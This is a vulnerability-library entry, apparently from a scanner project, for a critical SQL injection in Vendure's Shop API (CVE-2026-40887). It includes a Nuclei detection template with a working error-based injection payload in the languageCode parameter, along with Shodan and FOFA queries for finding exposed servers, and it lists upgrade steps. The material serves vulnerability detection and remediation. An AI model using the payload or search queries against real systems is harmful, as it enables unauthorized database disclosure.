/Vulnerability Library

Vendure Core - SQL Injection

CVE-2026-40887
Early Release

Description

Vendure, an open-source headless commerce platform built on Node.js/TypeScript, contains a critical SQL injection vulnerability in its Shop API. The languageCode query parameter is interpolated directly into a raw SQL CASE expression in ProductService.findOneBySlug without parameterization or input validation, allowing unauthenticated attackers to execute arbitrary SQL commands. This can lead to full database disclosure and denial of service.

Severity

Critical

CVSS Score

9.1

Published Date

April 17, 2026

Template Author

theamanrawat

CVE-2026-40887.yaml
id: CVE-2026-40887

info:
  name: Vendure Core - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    Vendure, an open-source headless commerce platform built on Node.js/TypeScript, contains a critical SQL injection vulnerability in its Shop API. The languageCode query parameter is interpolated directly into a raw SQL CASE expression in ProductService.findOneBySlug without parameterization or input validation, allowing unauthenticated attackers to execute arbitrary SQL commands. This can lead to full database disclosure and denial of service.
  remediation: Upgrade @vendure/core to version 3.6.2, 3.5.7, or 2.3.4 or later, which add input validation and parameterized queries for the languageCode parameter.
  reference:
    - https://github.com/advisories/GHSA-9pp3-53p2-ww9v
    - https://github.com/vendurehq/vendure/security/advisories/GHSA-9pp3-53p2-ww9v
    - https://github.com/vendurehq/vendure/commit/3ff0bc1
    - https://nvd.nist.gov/vuln/detail/CVE-2026-40887
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 9.1
    cve-id: CVE-2026-40887
    cwe-id: CWE-89
  metadata:
    max-request: 2
    verified: true
    shodan-query: http.header:"vendure-auth-token"
    fofa-query: header="vendure-auth-token"
  tags: cve,cve2026,vendure,sqli,unauthenticated

variables:
  num: 999999999

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /shop-api HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"query":"{ __typename }"}

    matchers:
      - type: dsl
        dsl:
          - 'contains(header, "vendure-auth-token")'
          - 'contains(body, "\"data\"")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /shop-api?languageCode=en'+AND+EXTRACTVALUE(5202,CONCAT(0x5c,(SELECT+MD5('{{num}}'))))+AND+'ptic'%3d'ptic HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"query":"{ product(slug: \"a\") { id name } }"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'c8c605999f3d8352d7bb792cf3fd'
          - '"product":'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d688833bc1c96b3f56ff489d2d2b4e0181da1f88c2ad122c4ca199f1a2a1e9a6022100f145cb370fda2d5612e04eba7c097b7b6804cc43ce1589de9ca2a59a51ddb0eb:922c64590222798bb761d5b6d8e72950
9.1Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
CVE ID:
cve-2026-40887
CWE ID:
cwe-89

References

https://github.com/advisories/GHSA-9pp3-53p2-ww9vhttps://github.com/vendurehq/vendure/security/advisories/GHSA-9pp3-53p2-ww9vhttps://github.com/vendurehq/vendure/commit/3ff0bc1https://nvd.nist.gov/vuln/detail/CVE-2026-40887

Remediation Steps

Upgrade @vendure/core to version 3.6.2, 3.5.7, or 2.3.4 or later, which add input validation and parameterized queries for the languageCode parameter.